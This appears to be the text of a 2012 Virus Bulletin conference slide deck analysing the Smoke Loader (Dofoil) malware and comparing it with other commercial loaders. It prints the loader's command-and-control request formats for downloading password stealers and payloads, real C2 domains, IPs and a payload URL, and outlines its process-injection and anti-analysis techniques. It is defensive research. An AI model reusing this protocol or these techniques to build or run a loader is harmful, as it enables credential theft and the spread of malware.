![Page 1: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/1.jpg)
THE CHEAPEST LOADER AROUND
Seeing Through the Smoke
M I C K Y P U N
S E P 2 6 T H , 2 0 1 2
![Page 2: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/2.jpg)
Outline
Introduction
The Ecosystem of Dofoil
Code Analysis Highlights
Traffic Analysis Highlights
The Revolution of Dofoil
Smoke Loader vs other Loaders
Conclusion / Followup
![Page 3: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/3.jpg)
Introduction
![Page 4: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/4.jpg)
Smoke Loader
Smoke Loader
Package
Administrative Interface
Loader Builder
Add-on modules
Dofoil
![Page 5: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/5.jpg)
![Page 6: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/6.jpg)
![Page 7: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/7.jpg)
![Page 8: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/8.jpg)
![Page 9: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/9.jpg)
![Page 10: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/10.jpg)
Downloaded Items
Upon successful execution it will download some of the following:
FakeAntivirus
Spambot
Hoax
Password stealer
SOCKS Server
Phishing (by HOST substitution)
![Page 11: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/11.jpg)
The Ecosystem of Dofoil
![Page 12: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/12.jpg)
The Ecosystem of Dofoil
Upload stolen information
Retrieve stolen information
Infected Computer
2C Server
![Page 13: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/13.jpg)
The Ecosystem of Dofoil
Spams
2C Server
Infected Computer
Infected Computer
Compromised webserver
Upload malicious file with stolen identity
Redirect to another URL
Modify download address
Request download file
Download file
![Page 14: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/14.jpg)
Code Analysis Highlights
![Page 15: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/15.jpg)
Code Analysis Highlights
One of the early adopters of the CreateSection-UnMapView0fSection-ResumeThread technique
Successful in evading malware detection basis on memory dump
![Page 16: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/16.jpg)
Code Analysis Highlight
Current_Process
Section
Encrypted Data Decrypted Data
containing Malicious code
![Page 17: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/17.jpg)
Current Process
New Section
Code Analysis Highlight
New Process (Copy of
svchost.exe) SUSPENDED
•PEB.IMAGEBASEADDRESS •Read 0x1000(PE HEADER) from IMAGEBASEADDRESS
Buffer (Size = Imagesize of
Svchost.exe)
Copy from ImageBase Address
•Find Entry point •Go to entry and change the instruction :
•JUMP [Address of Section of Malicious Routine] •Return
Section (with malicious
routine)
![Page 18: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/18.jpg)
Traffic Analysis Highlights
![Page 19: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/19.jpg)
PayLoad Flow diagram
Testing Network
Phase 1 Phase 2
Static Download
Dynamic Download
Phase 3
![Page 20: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/20.jpg)
Static Download Phase
Download password stealer
HTTP Request to 2C Server
[2C host]/index.php? cmd=grab &data= &login= [MD5 of the computer name] [volume serial number]
HTTP Reply to infected computer
Password Stealer MZ Encrypted with XOR key
![Page 21: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/21.jpg)
Static Download Phase
Download Socket Server
HTTP Request to 2C Server
[2C host]/index.php? cmd=getproxy
HTTP Reply to infected computer
Socket Server MZ MZ Encrypted with XOR key
![Page 22: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/22.jpg)
Static Download Phase
Notify Backdoor connection
HTTP Request to 2C Server
[2C host]/index.php? cmd=getsocks &login= [MD5 of the computer name] [volume serial number]
&port=[opened socket port number]
HTTP Reply to infected computer
HTTP/1.1 200 OK
![Page 23: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/23.jpg)
Dynamic Download Phase
Request for the number of dynamic downloads
HTTP Request to 2C Server
[2C host]/index.php? cmd=getload &login=[MD5 of the computer name][volume serial number]
&sel=[malware version name]
&ver=[malware version number]
&bits=0
HTTP Reply to infected computer
[Marker][number of files avaliable from 2C server]
![Page 24: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/24.jpg)
Example
32-bytes Md5Sum +
8-bytes Volume serial number
Version #
![Page 25: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/25.jpg)
Dynamic Download Phase
Iterate through the downloads
HTTP Request to 2C Server
[2C host]/index.php? cmd=getload &login=[MD5 of the computer name][volume serial number]
&sel=[malware version name]
&ver=[malware version number]
&bits=0 &file=[index]
HTTP Reply to infected computer
HTTP/1.1 302 Found Location: [URL of the executable]
![Page 26: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/26.jpg)
Dynamic Download Phase
Acknowledge execution
HTTP Request to 2C Server
[2C host]/index.php? cmd=getload &login=[MD5 of the computer name][volume serial number]
&sel=[malware version name]
&ver=[malware version number]
&bits=0 &file=[index]
&run=ok
HTTP Reply to infected computer
HTTP/1.1 200 OK
![Page 27: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/27.jpg)
The Evolution of Dofoil
![Page 28: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/28.jpg)
The Evolution of Dofoil
First Discovered
(~Nov 2011)
Added Anti-debug and Anti-VM mechanism
(~Jan 2012)
Changed outmost packer/
Encrypted all traffic
(~March 2012)
![Page 29: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/29.jpg)
Anti-debug
![Page 30: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/30.jpg)
Anti-VMware
![Page 31: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/31.jpg)
On the side note…
![Page 32: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/32.jpg)
Heuristic Evasion
Newer version(Feb 2012)
Older version(Jan 2012)
![Page 33: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/33.jpg)
Traffic Decryption Enhancement
Step 1: BASE64
Original
![Page 34: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/34.jpg)
Traffic Decryption Enhancement
Step 2: XOR with the first key byte
#define key[1]
#define data_length[4]
#define data[data_length]
Step 1: BASE64
![Page 35: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/35.jpg)
Remarks
Earlier generations has mostly static number of downloaded items
The later generations tends to give decreasing number of dynamic downloads when replicating more then once in recent time frame
![Page 36: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/36.jpg)
Smoke Loader vs other Loaders
![Page 37: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/37.jpg)
Ann Loader
Off the shelve product
Sold in plans from $330 to the most expensive $825
Updates is around $35 ~ $85
Source code is also available for sale
Task defined on server-side
Data of the location and status of bots. Statistic regarding botnet growth and health.
Modules available: Password stealer(ThiefX, host file substitution, Keylogger)
![Page 38: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/38.jpg)
Ann Loader
![Page 39: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/39.jpg)
Umbra Loader
Free and Open source
Pay by purchasing plugins
Polished Web Admin interface
Waiting for commands from 2C server
![Page 40: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/40.jpg)
Umbra Loader
![Page 41: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/41.jpg)
Umbra Loader
![Page 42: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/42.jpg)
Smoke Loader vs other Loaders
Smoke Loader Umbra Loader Ann Loader
Administrative interface √ √ √
Rebuild Loader √ √ √
Rebuild Builder √
Allows Files Upload and execution √ √
SOCKS5 server √ N/A* √
Host Subsitution √ N/A* √
Password Stealer/ Form Grabber √ N/A* √
Key logging N/A* √
Allows Additional Plugins √
Self destruction mechanism ** √ √
Price Starting at $150 Free Starting at $330
* Available for sale as a plugin by other developers ** A non-resident version is provided
![Page 43: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/43.jpg)
Conclusion Follow-up
![Page 44: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/44.jpg)
“The Smoke Loader Advantage”
Ideal candidate for PPI deployment
Provides a mixture of predetermined task and dynamic task
Lowers the entry cost barrier to the cyber crime industry
![Page 45: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/45.jpg)
Follow-up
Last Dofoil recorded
2012-05-10
beaufortseaa139.ru @ 213.152.180.178
First Sasfis discovered
2012-05-31
krasguatanany.ru@ 213.152.180.178
![Page 46: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/46.jpg)
Comparing Dofoil and Sasfis
Dofoil Sasfis
GET
/aaa/index.php?wFoAAACjraT9p6W0rK+h
pOasr6eprv3y9/KC8ob5+fP2hPOGhvPw+Y
Pz8PDx8YKG
After decryption
/aaa/index.php?cmd=load&272B2F9936D3
FF309C30011BF
GET /gley/index.php?r=gate&id=84a947ad&group=30.05.2012&debug=0
302 FOUND
http://triarearc.org/20030101news_files/1.
exe
c=rdl&u=http://krasguatanany.ru/gley/get/p3.dll.crp&a=0&k=0000493e
![Page 47: Seeing Through the Smoke - Virus Bulletin · Seeing Through the Smoke: the cheapest Loader Around Author: Micky Pun Created Date: 11/26/2012 8:32:56 PM](https://reader033.vdocuments.us/reader033/viewer/2022052023/60384637da04a761c558d691/html5/thumbnails/47.jpg)
Thank You